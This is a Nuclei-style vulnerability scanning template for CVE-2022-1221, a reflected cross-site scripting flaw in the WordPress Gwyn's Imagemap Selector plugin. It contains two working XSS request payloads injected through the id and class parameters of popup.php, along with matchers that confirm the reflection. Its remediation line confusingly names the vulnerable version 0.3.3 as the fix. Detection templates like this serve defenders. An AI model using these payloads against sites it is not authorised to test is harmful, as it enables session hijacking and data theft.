56 lines
2.3 KiB
YAML
56 lines
2.3 KiB
YAML
id: CVE-2022-1221
|
|
|
|
info:
|
|
name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting
|
|
author: veshraj
|
|
severity: medium
|
|
description: |
|
|
Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1221
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-1221
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00106
|
|
epss-percentile: 0.42838
|
|
cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: gwyn\'s_imagemap_selector_project
|
|
product: gwyn\'s_imagemap_selector
|
|
framework: wordpress
|
|
tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script> popup-"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502204a1db6991ecca761ab05cf5bd4fd48efc3fcbc37c6356abcfd41f57f46c25685022100d22a3098a42028bf2f1c2ac71fb0f7696512384b02e3092f02acc8f021093e84:922c64590222798bb761d5b6d8e72950 |